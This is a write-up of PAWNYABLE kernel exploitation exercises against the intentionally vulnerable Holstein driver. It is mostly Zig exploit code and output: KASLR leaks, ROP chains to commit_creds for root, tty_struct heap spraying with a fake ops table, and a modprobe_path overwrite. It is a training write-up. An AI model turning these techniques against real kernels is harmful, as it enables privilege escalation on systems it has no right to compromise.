2025-07-30
       Tags: pwn
       
       Table of Contents
       
           - v1: Stack Overflow
           - v2: Heap Overflow
           - v3: Use after Free
           - v4: Race Condition
           - userfaultfd
           - FUSE
           - CVE-2021-3490
       
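       I worked through ptr-yudai's PAWNYABLE [1].
       The solutions below are complicated and not explained in much detail, so they are probably hard to use as anything more than a reference.
       PAWNYABLE is really good material, so if you want to learn pwn, close this page and practice there instead.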
       
       My Japanese is poor[^fn:1], but I still want to practice writing.
       Also, Zig is very convenient for pwn (well, more so than C), yet there seem to be no resources on using it that way.
       
       == Holstein
       
       
       === v1: Stack Overflow
       
       
       First, let's check which mitigations are enabled.
       pwn checksec vuln.ko 2>&1
       [*] './src/vuln.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       cat /proc/cpuinfo | grep -q -e 'smep.*smap' && echo 'SMEP/SMAP enabled'
       cat /sys/devices/system/cpu/vulnerabilities/meltdown | grep -q -e 'PTI' && echo 'KPTI enabled'
       cat /proc/cmdline | grep -q -e 'nokaslr' || echo 'KASLR enabled'
       SMEP/SMAP enabled
       KPTI enabled
       KASLR enabled
       
       Let's check for FGKASLR as well:
       cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
       ffffffff99200000 T startup_64
       ffffffff99200040 T secondary_startup_64
       ffffffff99200045 T secondary_startup_64_no_verify
       ffffffff99200230 T __startup_64
       ffffffff992005e0 T startup_64_setup_env
       ffffffff9926e240 T prepare_kernel_cred
       ffffffff9926e390 T commit_creds
       ffffffff99a00e10 T swapgs_restore_regs_and_return_to_usermode
       # reboot and run again
       cat /proc/kallsyms | grep -e 'startup_64' -e 'swapgs_restore_regs_and_return_to_usermode' -e 'prepare_kernel_cred' -e 'commit_creds'
       ffffffffb7600000 T startup_64
       ffffffffb7600040 T secondary_startup_64
       ffffffffb7600045 T secondary_startup_64_no_verify
       ffffffffb7600230 T __startup_64
       ffffffffb76005e0 T startup_64_setup_env
       ffffffffb766e240 T prepare_kernel_cred
       ffffffffb766e390 T commit_creds
       ffffffffb7e00e10 T swapgs_restore_regs_and_return_to_usermode
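
The two listings can be compared mechanically. The sketch below hard-codes the addresses printed above and checks whether each symbol keeps the same distance from `startup_64` across the two boots. If the distances match, only the base moved, which suggests plain KASLR without per-function shuffling. The `Boot` struct and `sameLayout` helper are names made up for this illustration.

```zig
const std = @import("std");

// Symbol addresses copied from the two /proc/kallsyms listings above.
const Boot = struct {
    startup_64: u64,
    prepare_kernel_cred: u64,
    commit_creds: u64,
    trampoline: u64, // swapgs_restore_regs_and_return_to_usermode
};

const boot1 = Boot{
    .startup_64 = 0xffffffff99200000,
    .prepare_kernel_cred = 0xffffffff9926e240,
    .commit_creds = 0xffffffff9926e390,
    .trampoline = 0xffffffff99a00e10,
};

const boot2 = Boot{
    .startup_64 = 0xffffffffb7600000,
    .prepare_kernel_cred = 0xffffffffb766e240,
    .commit_creds = 0xffffffffb766e390,
    .trampoline = 0xffffffffb7e00e10,
};

/// True when every symbol keeps the same distance from startup_64 in both boots.
fn sameLayout(a: Boot, b: Boot) bool {
    return a.prepare_kernel_cred - a.startup_64 == b.prepare_kernel_cred - b.startup_64 and
        a.commit_creds - a.startup_64 == b.commit_creds - b.startup_64 and
        a.trampoline - a.startup_64 == b.trampoline - b.startup_64;
}

pub fn main() void {
    std.debug.print("prepare_kernel_cred offset: 0x{x}\n", .{boot1.prepare_kernel_cred - boot1.startup_64});
    std.debug.print("commit_creds offset:        0x{x}\n", .{boot1.commit_creds - boot1.startup_64});
    std.debug.print("layout identical across boots: {}\n", .{sameLayout(boot1, boot2)});
}
```

Since the function offsets do not change between boots, a single leaked kernel pointer should be enough to rebase every gadget.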
       
       First, to bypass KASLR we need an address leak.
       const std = @import("std");
       
       pub fn main() !void {
           const fd = try std.posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer std.posix.close(fd);
       
           var buf: [0x400 + 32]u8 = undefined;
           const bytes_read = try std.posix.read(fd, &buf);
           std.debug.dumpHex(buf[0..bytes_read]);
       }
       ffffffffa0a00000 T startup_64
       ffffffffa0a00000 T _stext
       ffffffffa0a00000 T _text
       ffffffffa0a00040 T secondary_startup_64
       ffffffffa0a00045 T secondary_startup_64_no_verify
       ffffffffa0a00110 t verify_cpu
       ffffffffa0a00210 T sev_verify_cbit
       ffffffffa0a00220 T start_cpu0
       ffffffffa0a00230 T __startup_64
       ffffffffa0a005e0 T startup_64_setup_env
       00007ffdcedd8528  06 00 00 00 04 00 00 00  40 00 00 00 00 00 00 00  ........@.......
       00007ffdcedd8538  40 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00  @.......@.......
       00007ffdcedd8548  68 02 00 00 00 00 00 00  68 02 00 00 00 00 00 00  h.......h.......
       00007ffdcedd8558  08 00 00 00 00 00 00 00  03 00 00 00 04 00 00 00  ................
       00007ffdcedd8568  A8 02 00 00 00 00 00 00  A8 02 00 00 00 00 00 00  ................
       00007ffdcedd8578  A8 02 00 00 00 00 00 00  16 00 00 00 00 00 00 00  ................
       00007ffdcedd8588  16 00 00 00 00 00 00 00  01 00 00 00 00 00 00 00  ................
       00007ffdcedd8598  01 00 00 00 04 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd85a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd85b8  50 AA 00 00 00 00 00 00  50 AA 00 00 00 00 00 00  P.......P.......
       00007ffdcedd85c8  00 10 00 00 00 00 00 00  01 00 00 00 05 00 00 00  ................
       00007ffdcedd85d8  00 B0 00 00 00 00 00 00  00 B0 00 00 00 00 00 00  ................
       00007ffdcedd85e8  00 B0 00 00 00 00 00 00  A4 FF 07 00 00 00 00 00  ................
       00007ffdcedd85f8  A4 FF 07 00 00 00 00 00  00 10 00 00 00 00 00 00  ................
       00007ffdcedd8608  01 00 00 00 04 00 00 00  00 B0 08 00 00 00 00 00  ................
       00007ffdcedd8618  00 B0 08 00 00 00 00 00  00 B0 08 00 00 00 00 00  ................
       00007ffdcedd8628  DC 68 02 00 00 00 00 00  DC 68 02 00 00 00 00 00  .h.......h......
       00007ffdcedd8638  00 10 00 00 00 00 00 00  01 00 00 00 06 00 00 00  ................
       00007ffdcedd8648  20 22 0B 00 00 00 00 00  20 32 0B 00 00 00 00 00   "...... 2......
       00007ffdcedd8658  20 32 0B 00 00 00 00 00  03 2E 00 00 00 00 00 00   2..............
       00007ffdcedd8668  70 35 00 00 00 00 00 00  00 10 00 00 00 00 00 00  p5..............
       00007ffdcedd8678  02 00 00 00 06 00 00 00  90 43 0B 00 00 00 00 00  .........C......
       00007ffdcedd8688  90 53 0B 00 00 00 00 00  90 53 0B 00 00 00 00 00  .S.......S......
       00007ffdcedd8698  90 01 00 00 00 00 00 00  90 01 00 00 00 00 00 00  ................
       00007ffdcedd86a8  08 00 00 00 00 00 00 00  04 00 00 00 04 00 00 00  ................
       00007ffdcedd86b8  C0 02 00 00 00 00 00 00  C0 02 00 00 00 00 00 00  ................
       00007ffdcedd86c8  C0 02 00 00 00 00 00 00  30 00 00 00 00 00 00 00  ........0.......
       00007ffdcedd86d8  30 00 00 00 00 00 00 00  08 00 00 00 00 00 00 00  0...............
       00007ffdcedd86e8  53 E5 74 64 04 00 00 00  C0 02 00 00 00 00 00 00  S.td............
       00007ffdcedd86f8  C0 02 00 00 00 00 00 00  C0 02 00 00 00 00 00 00  ................
       00007ffdcedd8708  30 00 00 00 00 00 00 00  30 00 00 00 00 00 00 00  0.......0.......
       00007ffdcedd8718  08 00 00 00 00 00 00 00  51 E5 74 64 06 00 00 00  ........Q.td....
       00007ffdcedd8728  00 2C 3B 03 8C 9B FF FF  00 00 00 00 00 00 00 00  .,;.............
       00007ffdcedd8738  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8748  00 00 00 00 00 00 00 00  10 00 00 00 00 00 00 00  ................
       00007ffdcedd8758  52 E5 74 64 04 00 00 00  20 22 0B 00 00 00 00 00  R.td.... "......
       00007ffdcedd8768  20 32 0B 00 00 00 00 00  20 32 0B 00 00 00 00 00   2...... 2......
       00007ffdcedd8778  E0 2D 00 00 00 00 00 00  E0 2D 00 00 00 00 00 00  .-.......-......
       00007ffdcedd8788  01 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8798  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87c8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87d8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87e8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd87f8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8808  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8818  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8828  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8838  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8848  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8858  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8868  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8878  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8888  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8898  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88a8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88c8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88d8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88e8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd88f8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8908  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8918  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffdcedd8928  E8 7E 54 80 04 B2 FF FF  3C D3 B3 A0 FF FF FF FF  .~T.....<.......
       00007ffdcedd8938  87 CD B4 A0 01 00 00 00  00 8A 6B 02 8C 9B FF FF  ..........k.....
       
       `buf[0x408..][0..8]` looks like a kernel pointer.
       No matter how many times the program is run, this address stays at a fixed offset from the kernel base address (the difference is `0x13d33c`).
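
As a worked example of that arithmetic, the sketch below takes the eight bytes found at offset `0x408` of the dump above and subtracts the fixed offset. The `kernelBase` helper is a name invented for this illustration and is not part of the exploit.

```zig
const std = @import("std");

// Distance between the leaked pointer and the kernel base, as measured in the text.
const leak_offset: u64 = 0x13d33c;

/// Interprets the eight leaked bytes as a little-endian pointer
/// and subtracts the fixed offset to recover the kernel base.
fn kernelBase(leaked: [8]u8) u64 {
    return std.mem.readInt(u64, &leaked, .little) - leak_offset;
}

pub fn main() void {
    // Bytes at offset 0x408 of the dump above.
    const leaked = [8]u8{ 0x3c, 0xd3, 0xb3, 0xa0, 0xff, 0xff, 0xff, 0xff };
    std.debug.print("kernel base: 0x{x}\n", .{kernelBase(leaked)});
}
```

The result, `0xffffffffa0a00000`, matches the `startup_64` address in the kallsyms output printed for the same boot.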
       
       The goal is privilege escalation to root, so let's call `commit_creds(prepare_kernel_cred(NULL))` with a ROP chain.
       ropr --nosys --nojop -R '^(pop rdi;|pop rcx;|mov rsi, rax;.*|add rdi, rsi;.*) ret;' vmlinux
       0xffffffff81049576: add rdi, rsi; add r8, rdi; mov rax, r8; ret;
       0xffffffff810a714a: mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
       0xffffffff81c9480d: pop rcx; ret;
       0xffffffff81cc6e66: pop rdi; ret;
       0xffffffff81f1f0e9: pop rdi; ret;
       0xffffffff81f496b1: add rdi, rsi; mov [rdi], rdx; mov [rdi+8], rcx; mov [rdi+0x10], r8d; ret;
       var POP_RDI: u64 = 0xffffffff811f61fd;
       var POP_RCX: u64 = 0xffffffff8146ee3c;
       var ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8: u64 = 0xffffffff81049576;
       var MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8: u64 = 0xffffffff810a714a;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var PREPARE_KERNEL_CRED: u64 = 0xffffffff8106e240;
       var COMMIT_CREDS: u64 = 0xffffffff8106e390;
       
       fn ropchain(fd: posix.fd_t) !void {
           const file = (std.fs.File{ .handle = fd }).writer();
           var bw = std.io.bufferedWriter(file);
           const writer = bw.writer();
       
           try writer.writeByteNTimes('A', 0x400+8);
           try writer.writeAll(std.mem.asBytes(&[_]u64{
               POP_RDI,
               0,
               PREPARE_KERNEL_CRED,
               POP_RDI,
               0,
               POP_RCX,
               0, // make sub rsi, rcx a nop
               MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8,
               ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8,
               COMMIT_CREDS,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&ret2win),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           }));
       
           try bw.flush();
           unreachable;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &POP_RDI,
               &POP_RCX,
               &ADD_RDI_RSI_ADD_R8_RDI_MOV_RAX_R8,
               &MOV_RSI_RAX_SUB_RSI_RCX_CMOV_R8_RSI_MOV_RAX_R8,
       
               &KPTI_TRAMPOLINE,
               &PREPARE_KERNEL_CRED,
               &COMMIT_CREDS,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       <<pawnyable-lib>>
       <<lk01-1-ropchain>>
       
       fn ret2win() noreturn {
           std.log.info("You won!!", .{});
       
           const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
           const env = [_:null]?[*:0]u8{};
           switch (posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
               else => unreachable,
           }
           unreachable;
       }
       
       fn leakBaseAddress(fd: posix.fd_t) !u64 {
           var buf: [0x408+8]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[0x408..]).*;
           return ret - 0x13d33c;
       }
       
       pub fn main() !void {
           catchSigsegv(&whoami);
           saveState();
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           const kernel_base = try leakBaseAddress(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&kernel_base)), .lower)});
           adjust_offsets(kernel_base-0xffffffff81000000);
       
           try ropchain(fd);
           unreachable;
       }
       whoami
       ./exploit
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffff81000000
       [INFO] You won!!
       root
       
 (DIR) Full exploit
       
       For reasons I don't fully understand, the process received a `SIGSEGV` after jumping to `ret2win`.
       `swapgs_restore_regs_and_return_to_usermode` is supposed to prevent this, but I took the easy way out and called `ret2win` again from a `sigaction` handler.
       
       === v2: Heap Overflow
       
       10c10
       < MODULE_DESCRIPTION("Holstein v1 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v2 - Vulnerable Kernel Driver for Pawnyable");
       31,32c31,32
       <                         char __user *buf, size_t count,
       <                         loff_t *f_pos)
       ---
       >                            char __user *buf, size_t count,
       >                            loff_t *f_pos)
       34,35d33
       <   char kbuf[BUFFER_SIZE] = { 0 };
       <
       38,39c36
       <   memcpy(kbuf, g_buf, BUFFER_SIZE);
       <   if (_copy_to_user(buf, kbuf, count)) {
       ---
       >   if (copy_to_user(buf, g_buf, count)) {
       51,52d47
       <   char kbuf[BUFFER_SIZE] = { 0 };
       <
       55c50
       <   if (_copy_from_user(kbuf, buf, count)) {
       ---
       >   if (copy_from_user(g_buf, buf, count)) {
       59d53
       <   memcpy(g_buf, kbuf, BUFFER_SIZE);
       
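       This time it is a heap attack.
       We cannot leak data from the stack or overwrite a return address.
       That is not a problem, though: if we overwrite a kernel structure properly, we can still escalate privileges.

       The heap overflow lets us write past the end of `g_buf`, but how can we make sure a structure is placed right after it?
       Heap spraying makes this easy. If we allocate many structures, they fill the slab that holds `g_buf`, so there is a high chance that one of them ends up directly after `g_buf`.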
       fn spray(fds: []posix.fd_t) !void {
           for (0..fds.len) |i| {
               fds[i] = try posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660);
           }
       }
       
       SLUB (the kernel's heap allocator) is a slab allocator, so it places objects of similar size in the same slab.
       Therefore we need a structure of about `0x400` bytes.
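
To make the size-class reasoning concrete, here is a small sketch that maps a request size to the generic cache it would land in. The list of cache sizes is an assumption based on the usual x86-64 configuration (powers of two plus the 96 and 192 byte caches), and `kmallocCache` is a made-up helper name.

```zig
const std = @import("std");

// Generic kmalloc cache sizes up to 8 KiB (assumed typical x86-64 configuration).
const kmalloc_sizes = [_]usize{ 8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192 };

/// Returns the smallest generic cache that fits `size`, or null if it is too large.
fn kmallocCache(size: usize) ?usize {
    for (kmalloc_sizes) |s| {
        if (size <= s) return s;
    }
    return null;
}

pub fn main() void {
    // g_buf is allocated with BUFFER_SIZE = 0x400 bytes.
    std.debug.print("g_buf (0x400 bytes) -> kmalloc-{d}\n", .{kmallocCache(0x400).?});
}
```

A 0x400-byte buffer lands in kmalloc-1024, so the spray needs an object from that same cache.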
       
         Table 1:
         Kernel structures usable for pwn in each SLUB size class (source [2])

       | Generic Cache | Object |
       |---------------|--------|
       | kmalloc-8     | pci_filp_private, signalfd_ctx |
       | kmalloc-16    | afs_file, aa_revision |
       | kmalloc-32    | vmci_host_dev, seq_operations (cg cache), coda_file_info, shm_file_data |
       | kmalloc-64    | snd_info_private_data, snd_ctl_file |
       | kmalloc-96    | subprocess_info, watch_queue, vfio_container |
       | kmalloc-128   | dlm_user_proc |
       | kmalloc-192   | loopback_pcm, snd_timer_user, pp_struct |
       | kmalloc-256   | vhci_data, snd_compr_file, msg_queue (cg cache) |
       | kmalloc-512   | tls_context, mousedev_client (`input` group) |
       | kmalloc-1024  | pipe_buffer, tty_struct, sock, xfrm_policy, nouveau_cli |
       | kmalloc-2048  | super_block, perf_event (SELinux disabled) |
       | kmalloc-4096  | net_device |
       
       `tty_struct`[^fn:2],[^fn:3] is especially handy: if we control `const struct tty_operations *ops`, calling `ioctl`[^fn:4] on that tty gives us ACE (Arbitrary Code Execution).
       It can also be used to leak a heap address.

       Next we need two kinds of leaks: a kernel address (to compute the ROP gadget addresses) and a heap address (to know where the malicious `struct tty_operations` lives).
       const std = @import("std");
       
       <<heap-spray>>
       
       pub fn main() !void {
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..50]);
       
           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try spray(ttys[50..]);
       
           var buf: [0x400+0x100]u8 = [_]u8{'A'}**0x400 ++ [_]u8{0}**0x100;
           const bytes_read = try posix.read(fd, &buf);
           std.debug.dumpHex(buf[0x400..bytes_read]);
       }
       00007ffed91dc3f8  01 54 00 00 01 00 00 00  00 00 00 00 00 00 00 00  .T..............
       00007ffed91dc408  00 50 D3 02 80 88 FF FF  80 88 C3 81 FF FF FF FF  .P..............
       00007ffed91dc418  32 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  2...............
       00007ffed91dc428  00 00 00 00 00 00 00 00  38 58 0D 03 80 88 FF FF  ........8X␍.....
       00007ffed91dc438  38 58 0D 03 80 88 FF FF  48 58 0D 03 80 88 FF FF  8X␍.....HX␍.....
       00007ffed91dc448  48 58 0D 03 80 88 FF FF  70 7D 73 02 80 88 FF FF  HX␍.....p}s.....
       00007ffed91dc458  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc468  70 58 0D 03 80 88 FF FF  70 58 0D 03 80 88 FF FF  pX␍.....pX␍.....
       00007ffed91dc478  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc488  90 58 0D 03 80 88 FF FF  90 58 0D 03 80 88 FF FF  .X␍......X␍.....
       00007ffed91dc498  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc4a8  B0 58 0D 03 80 88 FF FF  B0 58 0D 03 80 88 FF FF  .X␍......X␍.....
       00007ffed91dc4b8  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
       00007ffed91dc4c8  00 00 00 00 00 00 00 00  D8 58 0D 03 80 88 FF FF  .........X␍.....
       00007ffed91dc4d8  D8 58 0D 03 80 88 FF FF  00 00 00 00 00 00 00 00  .X␍.............
       00007ffed91dc4e8  00 00 00 00 00 00 00 00  F8 58 0D 03 80 88 FF FF  .........X␍.....
       
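       As it turns out, `tty_struct` contains both leaks!
       Handy indeed.
       In a normal `tty_struct`, `ops` holds the address of ptmx_fops [3] (`0xffffffff81c38880` in this vmlinux), and `ldisc_sem.read_wait` is an empty list head that points back at itself, which reveals the address of the `tty_struct`.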
       // as of 5.10.7
       const tty_struct = extern struct {
           const ld_semaphore = extern struct {
               const list_head = extern struct {
                   next: usize = 0xdeadbeefdeadbeef,
                   prev: usize = 0xcafebabecafebabe,
               };
       
               count: u64 = 0,
               wait_lock: i32 = 0,
               wait_readers: i32 = 0,
               read_wait: list_head = .{},
               write_wait: list_head = .{},
           };
       
           magic: i32 = 0x5401,
           kref: i32 = 0,
           dev: usize = 0,
           driver: usize, // must be a valid heap address
           ops: usize,
           index: i32 = 0,
           ldisc_sem: ld_semaphore = .{},
           // don't care about the rest
       
           pub fn init(ops_table: usize) tty_struct {
               // ops_table must live on the heap
               return .{
                   .driver = ops_table,
                   .ops = ops_table,
                   .ldisc_sem = .{
                       .read_wait = .{ .next = ops_table, .prev = ops_table },
                       .write_wait = .{ .next = ops_table, .prev = ops_table },
                   },
               };
           }
       };
       const tty_operations = extern struct {
           lookup: usize = 0,
           install: usize = 0,
           remove: usize = 0,
           open: usize = 0,
           close: usize = 0,
           shutdown: usize = 0,
           cleanup: usize = 0,
           write: usize = 0,
           put_char: usize = 0,
           flush_chars: usize = 0,
           write_room: usize = 0,
           chars_in_buffer: usize = 0,
           ioctl: usize,
       };
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr: u64 = 0xffffffff81c38880;
       
           var buf: [0x400+@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakGBuf(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [0x400+offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
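
To check those offsets against real data, the sketch below decodes the first `0x40` bytes of the `tty_struct` dump shown earlier. The field offsets (`0x18` for `ops`, `0x38` for `ldisc_sem.read_wait.next`) follow from the `extern struct` definition above. The `field` helper and the constant names are invented for this illustration.

```zig
const std = @import("std");

// First 0x40 bytes of the leaked tty_struct, copied from the dump above.
const leaked = [_]u8{
    0x01, 0x54, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x50, 0xd3, 0x02, 0x80, 0x88, 0xff, 0xff, 0x80, 0x88, 0xc3, 0x81, 0xff, 0xff, 0xff, 0xff,
    0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x38, 0x58, 0x0d, 0x03, 0x80, 0x88, 0xff, 0xff,
};

const ops_offset = 0x18; // tty_struct.ops
const read_wait_next_offset = 0x38; // tty_struct.ldisc_sem.read_wait.next
const ptmx_fops_addr: u64 = 0xffffffff81c38880; // static address given in the text
const g_buf_size: u64 = 0x400;

/// Reads the little-endian u64 stored at `off` in the leaked bytes.
fn field(off: usize) u64 {
    return std.mem.readInt(u64, leaked[off..][0..8], .little);
}

pub fn main() void {
    const kaslr_offset = field(ops_offset) - ptmx_fops_addr;
    // An empty list head points at itself, so subtracting its offset gives the
    // tty_struct address; g_buf sits 0x400 bytes before that.
    const tty_addr = field(read_wait_next_offset) - read_wait_next_offset;
    const g_buf = tty_addr - g_buf_size;
    std.debug.print("KASLR offset: 0x{x}\n", .{kaslr_offset});
    std.debug.print("tty_struct:   0x{x}\n", .{tty_addr});
    std.debug.print("g_buf:        0x{x}\n", .{g_buf});
}
```

For this particular dump the KASLR offset comes out as 0, because `ops` already holds the static address, and `g_buf` comes out as `0xffff8880030d5400`.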
       
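       Since we want to ROP, the `ioctl` entry of the malicious `tty_operations` is set to the address of a stack pivot gadget.

       Also, we control several registers when `ioctl` is called, so we pass the address of the ROP chain as the third argument, which the pivot gadget picks up from `rdx` (like this: `for (ttys) |tty| _ = std.os.linux.ioctl(tty, 0xdeadbeef, ropchain_addr);`).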
       fn posionTTYStruct(fd: posix.fd_t, g_buf_addr: u64) !void {
           const file = (std.fs.File{ .handle = fd }).writer();
           var bw = std.io.bufferedWriter(file);
           const writer = bw.writer();
       
           const fake_tty_ops = tty_operations{ .ioctl = PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP };
           try writer.writeAll(std.mem.asBytes(&fake_tty_ops));
           var n_written: usize = @sizeOf(@TypeOf(fake_tty_ops));
           n_written += try ropchain(writer);
       
           try writer.writeByteNTimes('A', 0x400 - n_written);
           try writer.writeAll(std.mem.asBytes(&tty_struct{ .driver = g_buf_addr, .ops = g_buf_addr })[0..@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]);
       
           try bw.flush();
       }
       
       The ROP chain overwrites `modprobe_path`.
       cat /proc/kallsyms | grep -e 'modprobe_path' -e 'swapgs_restore_regs_and_return_to_usermode'
       ffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode

       Without `CONFIG_KALLSYMS_ALL=y`, `modprobe_path` does not show up in `/proc/kallsyms`.
       The symbol still exists, of course.
       from pwn import *
       vmlinux = ELF("./vmlinux")
       hex(next(vmlinux.search("/sbin/modprobe\0")))
       0xffffffff81e38180
       var PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP: u64 = 0xffffffff813a478a; // stack pivot gadget
       
       var MOV_ADDROF_RAX_RDI: u64 = 0xffffffff8110840a;
       var POP_RAX: u64 = 0xffffffff8113dd3c;
       var POP_RDI_ADD_CL_CL: u64 = 0xffffffff81032f59;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var MODPROBE_PATH: u64 = 0xffffffff81e38180;
       
       fn ropchain(writer: anytype) !usize {
           const chain = [_]u64{
               0, // junk
               0, // junk
               POP_RDI_ADD_CL_CL,
               std.mem.readInt(u64, "/tmp/x\x00\x00", .little),
               POP_RAX,
               MODPROBE_PATH,
               MOV_ADDROF_RAX_RDI,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&modprobePath),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           };
           try writer.writeAll(std.mem.asBytes(&chain));
           return std.mem.asBytes(&chain).len;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &PUSH_RDX_MOV_EBP_0x415bffd9_POP_RSP_POP_R13_POP_RBP,
       
               &MOV_ADDROF_RAX_RDI,
               &POP_RAX,
               &POP_RDI_ADD_CL_CL,
       
               &KPTI_TRAMPOLINE,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
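
The immediate that the chain loads into `rdi` is just the new path packed into one 64-bit word. As a sketch of that packing, assuming the write gadget stores all eight bytes of `rdi` at once, the hypothetical `pack8` helper below zero-pads a short string and reads it back as a little-endian integer:

```zig
const std = @import("std");

/// Packs up to 8 bytes of `s` into a little-endian u64, zero-padding the rest.
fn pack8(s: []const u8) u64 {
    std.debug.assert(s.len <= 8);
    var bytes = [_]u8{0} ** 8;
    @memcpy(bytes[0..s.len], s);
    return std.mem.readInt(u64, &bytes, .little);
}

pub fn main() void {
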